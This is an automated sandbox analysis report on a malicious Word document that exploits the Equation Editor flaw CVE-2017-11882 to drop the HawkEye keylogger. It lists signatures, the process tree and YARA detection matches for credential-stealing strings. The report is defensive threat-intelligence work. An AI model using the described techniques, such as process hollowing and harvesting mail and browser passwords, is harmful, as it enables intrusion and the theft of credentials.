Play interactive tour

Edit tour

Windows Analysis Report New Updated 20210810.doc

Overview

General Information

Sample Name:	New Updated 20210810.doc
Analysis ID:	462616
MD5:	e7228f0fdb6675e599fce2e7697e237f
SHA1:	4ee29bd4a9e6756326728a6d3a2bcdb504d01e6a
SHA256:	03e73adb2a943786db217feedb75a14e7ce7ce39b8fb9f91a0fec989d1ce9188
Tags:	doc
Infos:
Most interesting Screenshot:

Detection

HawkEye MailPassView

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Detected HawkEye Rat

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for domain / URL

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Sigma detected: Droppers Exploiting CVE-2017-11882

Sigma detected: EQNEDT32.EXE connecting to internet

Sigma detected: File Dropped By EQNEDT32EXE

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Yara detected AntiVM3

Yara detected HawkEye Keylogger

Yara detected MailPassView

.NET source code contains potential unpacker

.NET source code references suspicious native API functions

Allocates memory in foreign processes

Changes the view of files in windows explorer (hidden files and folders)

Contains functionality to log keystrokes (.Net Source)

Hides that the sample has been downloaded from the Internet (zone.identifier)

Injects a PE file into a foreign processes

Machine Learning detection for dropped file

Office equation editor drops PE file

Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)

Sample uses process hollowing technique

Searches for Windows Mail specific files

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Instant Messenger accounts or passwords

Tries to steal Mail credentials (via file access)

Tries to steal Mail credentials (via file registry)

Writes to foreign memory regions

Yara detected WebBrowserPassView password recovery tool

Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)

Antivirus or Machine Learning detection for unpacked file

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Contains functionality for read data from the clipboard

Contains functionality to call native functions

Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)

Contains functionality to dynamically determine API calls

Contains functionality to launch a process as a different user

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Downloads executable code via HTTP

Dropped file seen in connection with other malware

Drops PE files

Enables debug privileges

Extensive use of GetProcAddress (often used to hide API calls)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

Found potential string decryption / allocating functions

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May infect USB drives

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Office Equation Editor has been started

Potential document exploit detected (performs DNS queries)

Potential document exploit detected (performs HTTP gets)

Potential document exploit detected (unknown TCP traffic)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Uses FTP

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Uses insecure TLS / SSL version for HTTPS connection

Yara signature match

Classification

Process Tree

System is w7x64

WINWORD.EXE (PID: 2824 cmdline: 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding MD5: 95C38D04597050285A18F66039EDB456)

EQNEDT32.EXE (PID: 2232 cmdline: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)

name.exe (PID: 1708 cmdline: 'C:\Users\user\AppData\Roaming\name.exe' MD5: 83F58ECF0778E3B0ACCA8497DF23EF23)

InstallUtil.exe (PID: 752 cmdline: C:\Users\user\AppData\Local\Temp\InstallUtil.exe MD5: BB85AA6D90A4157ED799257072B265FF)

vbc.exe (PID: 2004 cmdline: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holdermail.txt' MD5: 1672D0478049ABDAF0197BE64A7F867F)

vbc.exe (PID: 1756 cmdline: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holderwb.txt' MD5: 1672D0478049ABDAF0197BE64A7F867F)

cleanup

Malware Configuration

Threatname: HawkEye

{"Modules": ["WebBrowserPassView"], "Version": ""}

Yara Overview

Memory Dumps

Source	Rule	Description	Author	Strings
00000005.00000002.2378132295.0000000000760000.00000004.00000001.sdmp	HKTL_NET_GUID_Stealer	Detects c# red/black-team tools via typelibguid	Arnim Rupp	0x101b:$typelibguid0: 8fcd4931-91a2-4e18-849b-70de34ab75df
00000004.00000002.2153247223.0000000003F34000.00000004.00000001.sdmp	RAT_HawkEye	Detects HawkEye RAT	Kevin Breen <kevin@techanarchy.net>	0x7c292:$key: HawkEyeKeylogger 0xfe550:$key: HawkEyeKeylogger 0x7e490:$salt: 099u787978786 0x10074e:$salt: 099u787978786 0x7c8ab:$string1: HawkEye_Keylogger 0x7d6fe:$string1: HawkEye_Keylogger 0x7e3f0:$string1: HawkEye_Keylogger 0xfeb69:$string1: HawkEye_Keylogger 0xff9bc:$string1: HawkEye_Keylogger 0x1006ae:$string1: HawkEye_Keylogger 0x7cc94:$string2: holdermail.txt 0x7ccb4:$string2: holdermail.txt 0xfef52:$string2: holdermail.txt 0xfef72:$string2: holdermail.txt 0x7cbd6:$string3: wallet.dat 0x7cbee:$string3: wallet.dat 0x7cc04:$string3: wallet.dat 0xfee94:$string3: wallet.dat 0xfeeac:$string3: wallet.dat 0xfeec2:$string3: wallet.dat 0x7dfd2:$string4: Keylog Records
00000004.00000002.2153247223.0000000003F34000.00000004.00000001.sdmp	JoeSecurity_MailPassView	Yara detected MailPassView	Joe Security
00000004.00000002.2153247223.0000000003F34000.00000004.00000001.sdmp	JoeSecurity_HawkEye	Yara detected HawkEye Keylogger	Joe Security
00000004.00000002.2153247223.0000000003F34000.00000004.00000001.sdmp	JoeSecurity_WebBrowserPassView	Yara detected WebBrowserPassView password recovery tool	Joe Security
00000004.00000002.2153247223.0000000003F34000.00000004.00000001.sdmp	Hawkeye	detect HawkEye in memory	JPCERT/CC Incident Response Group	0x7c903:$hawkstr1: HawkEye Keylogger 0x7d744:$hawkstr1: HawkEye Keylogger 0x7da73:$hawkstr1: HawkEye Keylogger 0x7dbce:$hawkstr1: HawkEye Keylogger 0x7dd31:$hawkstr1: HawkEye Keylogger 0x7dfaa:$hawkstr1: HawkEye Keylogger 0xfebc1:$hawkstr1: HawkEye Keylogger 0xffa02:$hawkstr1: HawkEye Keylogger 0xffd31:$hawkstr1: HawkEye Keylogger 0xffe8c:$hawkstr1: HawkEye Keylogger 0xfffef:$hawkstr1: HawkEye Keylogger 0x100268:$hawkstr1: HawkEye Keylogger 0x7c491:$hawkstr2: Dear HawkEye Customers! 0x7dac6:$hawkstr2: Dear HawkEye Customers! 0x7dc1d:$hawkstr2: Dear HawkEye Customers! 0x7dd84:$hawkstr2: Dear HawkEye Customers! 0xfe74f:$hawkstr2: Dear HawkEye Customers! 0xffd84:$hawkstr2: Dear HawkEye Customers! 0xffedb:$hawkstr2: Dear HawkEye Customers! 0x100042:$hawkstr2: Dear HawkEye Customers! 0x7c5b2:$hawkstr3: HawkEye Logger Details:
00000007.00000002.2174054080.0000000000400000.00000040.00000001.sdmp	JoeSecurity_WebBrowserPassView	Yara detected WebBrowserPassView password recovery tool	Joe Security
00000005.00000002.2379534717.0000000003331000.00000004.00000001.sdmp	JoeSecurity_MailPassView	Yara detected MailPassView	Joe Security
00000005.00000002.2379534717.0000000003331000.00000004.00000001.sdmp	JoeSecurity_WebBrowserPassView	Yara detected WebBrowserPassView password recovery tool	Joe Security
00000006.00000002.2171177325.0000000000400000.00000040.00000001.sdmp	JoeSecurity_MailPassView	Yara detected MailPassView	Joe Security
00000005.00000002.2377820244.0000000000402000.00000040.00000001.sdmp	RAT_HawkEye	Detects HawkEye RAT	Kevin Breen <kevin@techanarchy.net>	0x7b6c0:$key: HawkEyeKeylogger 0x7d8be:$salt: 099u787978786 0x7bcd9:$string1: HawkEye_Keylogger 0x7cb2c:$string1: HawkEye_Keylogger 0x7d81e:$string1: HawkEye_Keylogger 0x7c0c2:$string2: holdermail.txt 0x7c0e2:$string2: holdermail.txt 0x7c004:$string3: wallet.dat 0x7c01c:$string3: wallet.dat 0x7c032:$string3: wallet.dat 0x7d400:$string4: Keylog Records 0x7d718:$string4: Keylog Records 0x7d916:$string5: do not script --> 0x7b6a8:$string6: \pidloc.txt 0x7b70e:$string7: BSPLIT 0x7b71e:$string7: BSPLIT
00000005.00000002.2377820244.0000000000402000.00000040.00000001.sdmp	JoeSecurity_MailPassView	Yara detected MailPassView	Joe Security
00000005.00000002.2377820244.0000000000402000.00000040.00000001.sdmp	JoeSecurity_HawkEye	Yara detected HawkEye Keylogger	Joe Security
00000005.00000002.2377820244.0000000000402000.00000040.00000001.sdmp	JoeSecurity_WebBrowserPassView	Yara detected WebBrowserPassView password recovery tool	Joe Security
00000005.00000002.2377820244.0000000000402000.00000040.00000001.sdmp	Hawkeye	detect HawkEye in memory	JPCERT/CC Incident Response Group	0x7bd31:$hawkstr1: HawkEye Keylogger 0x7cb72:$hawkstr1: HawkEye Keylogger 0x7cea1:$hawkstr1: HawkEye Keylogger 0x7cffc:$hawkstr1: HawkEye Keylogger 0x7d15f:$hawkstr1: HawkEye Keylogger 0x7d3d8:$hawkstr1: HawkEye Keylogger 0x7b8bf:$hawkstr2: Dear HawkEye Customers! 0x7cef4:$hawkstr2: Dear HawkEye Customers! 0x7d04b:$hawkstr2: Dear HawkEye Customers! 0x7d1b2:$hawkstr2: Dear HawkEye Customers! 0x7b9e0:$hawkstr3: HawkEye Logger Details:
00000004.00000002.2152897336.0000000003B98000.00000004.00000001.sdmp	RAT_HawkEye	Detects HawkEye RAT	Kevin Breen <kevin@techanarchy.net>	0x7bbf0:$key: HawkEyeKeylogger 0x7ddee:$salt: 099u787978786 0x7c209:$string1: HawkEye_Keylogger 0x7d05c:$string1: HawkEye_Keylogger 0x7dd4e:$string1: HawkEye_Keylogger 0x7c5f2:$string2: holdermail.txt 0x7c612:$string2: holdermail.txt 0x7c534:$string3: wallet.dat 0x7c54c:$string3: wallet.dat 0x7c562:$string3: wallet.dat 0x7d930:$string4: Keylog Records 0x7dc48:$string4: Keylog Records 0x7de46:$string5: do not script --> 0x7bbd8:$string6: \pidloc.txt 0x7bc3e:$string7: BSPLIT 0x7bc4e:$string7: BSPLIT
00000004.00000002.2152897336.0000000003B98000.00000004.00000001.sdmp	JoeSecurity_MailPassView	Yara detected MailPassView	Joe Security
00000004.00000002.2152897336.0000000003B98000.00000004.00000001.sdmp	JoeSecurity_HawkEye	Yara detected HawkEye Keylogger	Joe Security
00000004.00000002.2152897336.0000000003B98000.00000004.00000001.sdmp	JoeSecurity_WebBrowserPassView	Yara detected WebBrowserPassView password recovery tool	Joe Security
00000004.00000002.2152897336.0000000003B98000.00000004.00000001.sdmp	Hawkeye	detect HawkEye in memory	JPCERT/CC Incident Response Group	0x7c261:$hawkstr1: HawkEye Keylogger 0x7d0a2:$hawkstr1: HawkEye Keylogger 0x7d3d1:$hawkstr1: HawkEye Keylogger 0x7d52c:$hawkstr1: HawkEye Keylogger 0x7d68f:$hawkstr1: HawkEye Keylogger 0x7d908:$hawkstr1: HawkEye Keylogger 0x7bdef:$hawkstr2: Dear HawkEye Customers! 0x7d424:$hawkstr2: Dear HawkEye Customers! 0x7d57b:$hawkstr2: Dear HawkEye Customers! 0x7d6e2:$hawkstr2: Dear HawkEye Customers! 0x7bf10:$hawkstr3: HawkEye Logger Details:
00000005.00000002.2377939317.0000000000520000.00000004.00000001.sdmp	HKTL_NET_GUID_Stealer	Detects c# red/black-team tools via typelibguid	Arnim Rupp	0x101b:$typelibguid0: 8fcd4931-91a2-4e18-849b-70de34ab75df
00000005.00000002.2378443335.0000000002331000.00000004.00000001.sdmp	JoeSecurity_HawkEye	Yara detected HawkEye Keylogger	Joe Security
00000005.00000002.2378443335.0000000002331000.00000004.00000001.sdmp	Hawkeye	detect HawkEye in memory	JPCERT/CC Incident Response Group	0x2ff98:$hawkstr1: HawkEye Keylogger 0x33338:$hawkstr1: HawkEye Keylogger 0x336b8:$hawkstr1: HawkEye Keylogger 0x381a8:$hawkstr1: HawkEye Keylogger 0x3ab08:$hawkstr1: HawkEye Keylogger 0x2fa50:$hawkstr2: Dear HawkEye Customers! 0x33398:$hawkstr2: Dear HawkEye Customers! 0x33718:$hawkstr2: Dear HawkEye Customers! 0x3ab64:$hawkstr2: Dear HawkEye Customers! 0x2fb7e:$hawkstr3: HawkEye Logger Details:
00000004.00000002.2153085167.0000000003CA9000.00000004.00000001.sdmp	RAT_HawkEye	Detects HawkEye RAT	Kevin Breen <kevin@techanarchy.net>	0xfe762:$key: HawkEyeKeylogger 0x180a42:$key: HawkEyeKeylogger 0x202d12:$key: HawkEyeKeylogger 0x100960:$salt: 099u787978786 0x182c40:$salt: 099u787978786 0x204f10:$salt: 099u787978786 0xfed7b:$string1: HawkEye_Keylogger 0xffbce:$string1: HawkEye_Keylogger 0x1008c0:$string1: HawkEye_Keylogger 0x18105b:$string1: HawkEye_Keylogger 0x181eae:$string1: HawkEye_Keylogger 0x182ba0:$string1: HawkEye_Keylogger 0x20332b:$string1: HawkEye_Keylogger 0x20417e:$string1: HawkEye_Keylogger 0x204e70:$string1: HawkEye_Keylogger 0xff164:$string2: holdermail.txt 0xff184:$string2: holdermail.txt 0x181444:$string2: holdermail.txt 0x181464:$string2: holdermail.txt 0x203714:$string2: holdermail.txt 0x203734:$string2: holdermail.txt
00000004.00000002.2153085167.0000000003CA9000.00000004.00000001.sdmp	JoeSecurity_MailPassView	Yara detected MailPassView	Joe Security
00000004.00000002.2153085167.0000000003CA9000.00000004.00000001.sdmp	JoeSecurity_HawkEye	Yara detected HawkEye Keylogger	Joe Security
00000004.00000002.2153085167.0000000003CA9000.00000004.00000001.sdmp	JoeSecurity_WebBrowserPassView	Yara detected WebBrowserPassView password recovery tool	Joe Security
00000004.00000002.2153085167.0000000003CA9000.00000004.00000001.sdmp	Hawkeye	detect HawkEye in memory	JPCERT/CC Incident Response Group	0xfedd3:$hawkstr1: HawkEye Keylogger 0xffc14:$hawkstr1: HawkEye Keylogger 0xfff43:$hawkstr1: HawkEye Keylogger 0x10009e:$hawkstr1: HawkEye Keylogger 0x100201:$hawkstr1: HawkEye Keylogger 0x10047a:$hawkstr1: HawkEye Keylogger 0x1810b3:$hawkstr1: HawkEye Keylogger 0x181ef4:$hawkstr1: HawkEye Keylogger 0x182223:$hawkstr1: HawkEye Keylogger 0x18237e:$hawkstr1: HawkEye Keylogger 0x1824e1:$hawkstr1: HawkEye Keylogger 0x18275a:$hawkstr1: HawkEye Keylogger 0x203383:$hawkstr1: HawkEye Keylogger 0x2041c4:$hawkstr1: HawkEye Keylogger 0x2044f3:$hawkstr1: HawkEye Keylogger 0x20464e:$hawkstr1: HawkEye Keylogger 0x2047b1:$hawkstr1: HawkEye Keylogger 0x204a2a:$hawkstr1: HawkEye Keylogger 0xfe961:$hawkstr2: Dear HawkEye Customers! 0xfff96:$hawkstr2: Dear HawkEye Customers! 0x1000ed:$hawkstr2: Dear HawkEye Customers!
Process Memory Space: name.exe PID: 1708	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: name.exe PID: 1708	JoeSecurity_MailPassView	Yara detected MailPassView	Joe Security
Process Memory Space: name.exe PID: 1708	JoeSecurity_HawkEye	Yara detected HawkEye Keylogger	Joe Security
Process Memory Space: name.exe PID: 1708	JoeSecurity_WebBrowserPassView	Yara detected WebBrowserPassView password recovery tool	Joe Security
Process Memory Space: InstallUtil.exe PID: 752	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: InstallUtil.exe PID: 752	JoeSecurity_MailPassView	Yara detected MailPassView	Joe Security
Process Memory Space: InstallUtil.exe PID: 752	JoeSecurity_HawkEye	Yara detected HawkEye Keylogger	Joe Security
Process Memory Space: InstallUtil.exe PID: 752	JoeSecurity_WebBrowserPassView	Yara detected WebBrowserPassView password recovery tool	Joe Security
Process Memory Space: vbc.exe PID: 2004	JoeSecurity_MailPassView	Yara detected MailPassView	Joe Security
Click to see the 32 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
5.2.InstallUtil.exe.760000.5.raw.unpack	HKTL_NET_GUID_Stealer	Detects c# red/black-team tools via typelibguid	Arnim Rupp	0x101b:$typelibguid0: 8fcd4931-91a2-4e18-849b-70de34ab75df
5.2.InstallUtil.exe.520000.4.raw.unpack	HKTL_NET_GUID_Stealer	Detects c# red/black-team tools via typelibguid	Arnim Rupp	0x101b:$typelibguid0: 8fcd4931-91a2-4e18-849b-70de34ab75df
5.2.InstallUtil.exe.45fa72.2.unpack	JoeSecurity_MailPassView	Yara detected MailPassView	Joe Security
4.2.name.exe.3bf5fa2.10.unpack	JoeSecurity_MailPassView	Yara detected MailPassView	Joe Security
4.2.name.exe.3d33caf.12.unpack	JoeSecurity_WebBrowserPassView	Yara detected WebBrowserPassView password recovery tool	Joe Security
5.2.InstallUtil.exe.45fa72.2.raw.unpack	RAT_HawkEye	Detects HawkEye RAT	Kevin Breen <kevin@techanarchy.net>	0x1dc4e:$key: HawkEyeKeylogger 0x1fe4c:$salt: 099u787978786 0x1e267:$string1: HawkEye_Keylogger 0x1f0ba:$string1: HawkEye_Keylogger 0x1fdac:$string1: HawkEye_Keylogger 0x1e650:$string2: holdermail.txt 0x1e670:$string2: holdermail.txt 0x1e592:$string3: wallet.dat 0x1e5aa:$string3: wallet.dat 0x1e5c0:$string3: wallet.dat 0x1f98e:$string4: Keylog Records 0x1fca6:$string4: Keylog Records 0x1fea4:$string5: do not script --> 0x1dc36:$string6: \pidloc.txt 0x1dc9c:$string7: BSPLIT 0x1dcac:$string7: BSPLIT
5.2.InstallUtil.exe.45fa72.2.raw.unpack	JoeSecurity_MailPassView	Yara detected MailPassView	Joe Security
5.2.InstallUtil.exe.45fa72.2.raw.unpack	JoeSecurity_HawkEye	Yara detected HawkEye Keylogger	Joe Security
5.2.InstallUtil.exe.45fa72.2.raw.unpack	Hawkeye	detect HawkEye in memory	JPCERT/CC Incident Response Group	0x1e2bf:$hawkstr1: HawkEye Keylogger 0x1f100:$hawkstr1: HawkEye Keylogger 0x1f42f:$hawkstr1: HawkEye Keylogger 0x1f58a:$hawkstr1: HawkEye Keylogger 0x1f6ed:$hawkstr1: HawkEye Keylogger 0x1f966:$hawkstr1: HawkEye Keylogger 0x1de4d:$hawkstr2: Dear HawkEye Customers! 0x1f482:$hawkstr2: Dear HawkEye Customers! 0x1f5d9:$hawkstr2: Dear HawkEye Customers! 0x1f740:$hawkstr2: Dear HawkEye Customers! 0x1df6e:$hawkstr3: HawkEye Logger Details:
5.2.InstallUtil.exe.409c0d.3.unpack	JoeSecurity_WebBrowserPassView	Yara detected WebBrowserPassView password recovery tool	Joe Security
7.2.vbc.exe.400000.0.unpack	JoeSecurity_WebBrowserPassView	Yara detected WebBrowserPassView password recovery tool	Joe Security
5.2.InstallUtil.exe.400000.0.unpack	RAT_HawkEye	Detects HawkEye RAT	Kevin Breen <kevin@techanarchy.net>	0x7b8c0:$key: HawkEyeKeylogger 0x7dabe:$salt: 099u787978786 0x7bed9:$string1: HawkEye_Keylogger 0x7cd2c:$string1: HawkEye_Keylogger 0x7da1e:$string1: HawkEye_Keylogger 0x7c2c2:$string2: holdermail.txt 0x7c2e2:$string2: holdermail.txt 0x7c204:$string3: wallet.dat 0x7c21c:$string3: wallet.dat 0x7c232:$string3: wallet.dat 0x7d600:$string4: Keylog Records 0x7d918:$string4: Keylog Records 0x7db16:$string5: do not script --> 0x7b8a8:$string6: \pidloc.txt 0x7b90e:$string7: BSPLIT 0x7b91e:$string7: BSPLIT
5.2.InstallUtil.exe.400000.0.unpack	HKTL_NET_GUID_Stealer	Detects c# red/black-team tools via typelibguid	Arnim Rupp	0x7423:$typelibguid0: 8fcd4931-91a2-4e18-849b-70de34ab75df
5.2.InstallUtil.exe.400000.0.unpack	JoeSecurity_MailPassView	Yara detected MailPassView	Joe Security
5.2.InstallUtil.exe.400000.0.unpack	JoeSecurity_HawkEye	Yara detected HawkEye Keylogger	Joe Security
5.2.InstallUtil.exe.400000.0.unpack	JoeSecurity_WebBrowserPassView	Yara detected WebBrowserPassView password recovery tool	Joe Security
5.2.InstallUtil.exe.400000.0.unpack	Hawkeye	detect HawkEye in memory	JPCERT/CC Incident Response Group	0x7bf31:$hawkstr1: HawkEye Keylogger 0x7cd72:$hawkstr1: HawkEye Keylogger 0x7d0a1:$hawkstr1: HawkEye Keylogger 0x7d1fc:$hawkstr1: HawkEye Keylogger 0x7d35f:$hawkstr1: HawkEye Keylogger 0x7d5d8:$hawkstr1: HawkEye Keylogger 0x7babf:$hawkstr2: Dear HawkEye Customers! 0x7d0f4:$hawkstr2: Dear HawkEye Customers! 0x7d24b:$hawkstr2: Dear HawkEye Customers! 0x7d3b2:$hawkstr2: Dear HawkEye Customers! 0x7bbe0:$hawkstr3: HawkEye Logger Details:
4.2.name.exe.3f3c7df.15.unpack	JoeSecurity_WebBrowserPassView	Yara detected WebBrowserPassView password recovery tool	Joe Security
6.2.vbc.exe.400000.0.unpack	JoeSecurity_MailPassView	Yara detected MailPassView	Joe Security
4.2.name.exe.3bf5fa2.10.raw.unpack	RAT_HawkEye	Detects HawkEye RAT	Kevin Breen <kevin@techanarchy.net>	0x1dc4e:$key: HawkEyeKeylogger 0x1fe4c:$salt: 099u787978786 0x1e267:$string1: HawkEye_Keylogger 0x1f0ba:$string1: HawkEye_Keylogger 0x1fdac:$string1: HawkEye_Keylogger 0x1e650:$string2: holdermail.txt 0x1e670:$string2: holdermail.txt 0x1e592:$string3: wallet.dat 0x1e5aa:$string3: wallet.dat 0x1e5c0:$string3: wallet.dat 0x1f98e:$string4: Keylog Records 0x1fca6:$string4: Keylog Records 0x1fea4:$string5: do not script --> 0x1dc36:$string6: \pidloc.txt 0x1dc9c:$string7: BSPLIT 0x1dcac:$string7: BSPLIT
4.2.name.exe.3bf5fa2.10.raw.unpack	JoeSecurity_MailPassView	Yara detected MailPassView	Joe Security
4.2.name.exe.3bf5fa2.10.raw.unpack	JoeSecurity_HawkEye	Yara detected HawkEye Keylogger	Joe Security
4.2.name.exe.3bf5fa2.10.raw.unpack	Hawkeye	detect HawkEye in memory	JPCERT/CC Incident Response Group	0x1e2bf:$hawkstr1: HawkEye Keylogger 0x1f100:$hawkstr1: HawkEye Keylogger 0x1f42f:$hawkstr1: HawkEye Keylogger 0x1f58a:$hawkstr1: HawkEye Keylogger 0x1f6ed:$hawkstr1: HawkEye Keylogger 0x1f966:$hawkstr1: HawkEye Keylogger 0x1de4d:$hawkstr2: Dear HawkEye Customers! 0x1f482:$hawkstr2: Dear HawkEye Customers! 0x1f5d9:$hawkstr2: Dear HawkEye Customers! 0x1f740:$hawkstr2: Dear HawkEye Customers! 0x1df6e:$hawkstr3: HawkEye Logger Details:
5.2.InstallUtil.exe.33516f0.12.unpack	JoeSecurity_WebBrowserPassView	Yara detected WebBrowserPassView password recovery tool	Joe Security
4.2.name.exe.3ba013d.9.unpack	JoeSecurity_WebBrowserPassView	Yara detected WebBrowserPassView password recovery tool	Joe Security
4.2.name.exe.3f349d2.16.unpack	RAT_HawkEye	Detects HawkEye RAT	Kevin Breen <kevin@techanarchy.net>	0x79ac0:$key: HawkEyeKeylogger 0x7bcbe:$salt: 099u787978786 0x7a0d9:$string1: HawkEye_Keylogger 0x7af2c:$string1: HawkEye_Keylogger 0x7bc1e:$string1: HawkEye_Keylogger 0x7a4c2:$string2: holdermail.txt 0x7a4e2:$string2: holdermail.txt 0x7a404:$string3: wallet.dat 0x7a41c:$string3: wallet.dat 0x7a432:$string3: wallet.dat 0x7b800:$string4: Keylog Records 0x7bb18:$string4: Keylog Records 0x7bd16:$string5: do not script --> 0x79aa8:$string6: \pidloc.txt 0x79b0e:$string7: BSPLIT 0x79b1e:$string7: BSPLIT
4.2.name.exe.3f349d2.16.unpack	HKTL_NET_GUID_Stealer	Detects c# red/black-team tools via typelibguid	Arnim Rupp	0x5623:$typelibguid0: 8fcd4931-91a2-4e18-849b-70de34ab75df
4.2.name.exe.3f349d2.16.unpack	JoeSecurity_MailPassView	Yara detected MailPassView	Joe Security
4.2.name.exe.3f349d2.16.unpack	JoeSecurity_HawkEye	Yara detected HawkEye Keylogger	Joe Security
4.2.name.exe.3f349d2.16.unpack	JoeSecurity_WebBrowserPassView	Yara detected WebBrowserPassView password recovery tool	Joe Security
4.2.name.exe.3f349d2.16.unpack	Hawkeye	detect HawkEye in memory	JPCERT/CC Incident Response Group	0x7a131:$hawkstr1: HawkEye Keylogger 0x7af72:$hawkstr1: HawkEye Keylogger 0x7b2a1:$hawkstr1: HawkEye Keylogger 0x7b3fc:$hawkstr1: HawkEye Keylogger 0x7b55f:$hawkstr1: HawkEye Keylogger 0x7b7d8:$hawkstr1: HawkEye Keylogger 0x79cbf:$hawkstr2: Dear HawkEye Customers! 0x7b2f4:$hawkstr2: Dear HawkEye Customers! 0x7b44b:$hawkstr2: Dear HawkEye Customers! 0x7b5b2:$hawkstr2: Dear HawkEye Customers! 0x79de0:$hawkstr3: HawkEye Logger Details:
5.2.InstallUtil.exe.408208.1.raw.unpack	RAT_HawkEye	Detects HawkEye RAT	Kevin Breen <kevin@techanarchy.net>	0x754b8:$key: HawkEyeKeylogger 0x776b6:$salt: 099u787978786 0x75ad1:$string1: HawkEye_Keylogger 0x76924:$string1: HawkEye_Keylogger 0x77616:$string1: HawkEye_Keylogger 0x75eba:$string2: holdermail.txt 0x75eda:$string2: holdermail.txt 0x75dfc:$string3: wallet.dat 0x75e14:$string3: wallet.dat 0x75e2a:$string3: wallet.dat 0x771f8:$string4: Keylog Records 0x77510:$string4: Keylog Records 0x7770e:$string5: do not script --> 0x754a0:$string6: \pidloc.txt 0x75506:$string7: BSPLIT 0x75516:$string7: BSPLIT
5.2.InstallUtil.exe.408208.1.raw.unpack	HKTL_NET_GUID_Stealer	Detects c# red/black-team tools via typelibguid	Arnim Rupp	0x101b:$typelibguid0: 8fcd4931-91a2-4e18-849b-70de34ab75df
5.2.InstallUtil.exe.408208.1.raw.unpack	JoeSecurity_MailPassView	Yara detected MailPassView	Joe Security
5.2.InstallUtil.exe.408208.1.raw.unpack	JoeSecurity_HawkEye	Yara detected HawkEye Keylogger	Joe Security
5.2.InstallUtil.exe.408208.1.raw.unpack	JoeSecurity_WebBrowserPassView	Yara detected WebBrowserPassView password recovery tool	Joe Security
5.2.InstallUtil.exe.408208.1.raw.unpack	Hawkeye	detect HawkEye in memory	JPCERT/CC Incident Response Group	0x75b29:$hawkstr1: HawkEye Keylogger 0x7696a:$hawkstr1: HawkEye Keylogger 0x76c99:$hawkstr1: HawkEye Keylogger 0x76df4:$hawkstr1: HawkEye Keylogger 0x76f57:$hawkstr1: HawkEye Keylogger 0x771d0:$hawkstr1: HawkEye Keylogger 0x756b7:$hawkstr2: Dear HawkEye Customers! 0x76cec:$hawkstr2: Dear HawkEye Customers! 0x76e43:$hawkstr2: Dear HawkEye Customers! 0x76faa:$hawkstr2: Dear HawkEye Customers! 0x757d8:$hawkstr3: HawkEye Logger Details:
4.2.name.exe.3f3adda.17.raw.unpack	RAT_HawkEye	Detects HawkEye RAT	Kevin Breen <kevin@techanarchy.net>	0x754b8:$key: HawkEyeKeylogger 0xf7776:$key: HawkEyeKeylogger 0x776b6:$salt: 099u787978786 0xf9974:$salt: 099u787978786 0x75ad1:$string1: HawkEye_Keylogger 0x76924:$string1: HawkEye_Keylogger 0x77616:$string1: HawkEye_Keylogger 0xf7d8f:$string1: HawkEye_Keylogger 0xf8be2:$string1: HawkEye_Keylogger 0xf98d4:$string1: HawkEye_Keylogger 0x75eba:$string2: holdermail.txt 0x75eda:$string2: holdermail.txt 0xf8178:$string2: holdermail.txt 0xf8198:$string2: holdermail.txt 0x75dfc:$string3: wallet.dat 0x75e14:$string3: wallet.dat 0x75e2a:$string3: wallet.dat 0xf80ba:$string3: wallet.dat 0xf80d2:$string3: wallet.dat 0xf80e8:$string3: wallet.dat 0x771f8:$string4: Keylog Records
4.2.name.exe.3f3adda.17.raw.unpack	HKTL_NET_GUID_Stealer	Detects c# red/black-team tools via typelibguid	Arnim Rupp	0x101b:$typelibguid0: 8fcd4931-91a2-4e18-849b-70de34ab75df 0x832d9:$typelibguid0: 8fcd4931-91a2-4e18-849b-70de34ab75df
4.2.name.exe.3f3adda.17.raw.unpack	JoeSecurity_MailPassView	Yara detected MailPassView	Joe Security
4.2.name.exe.3f3adda.17.raw.unpack	JoeSecurity_HawkEye	Yara detected HawkEye Keylogger	Joe Security
4.2.name.exe.3f3adda.17.raw.unpack	JoeSecurity_WebBrowserPassView	Yara detected WebBrowserPassView password recovery tool	Joe Security
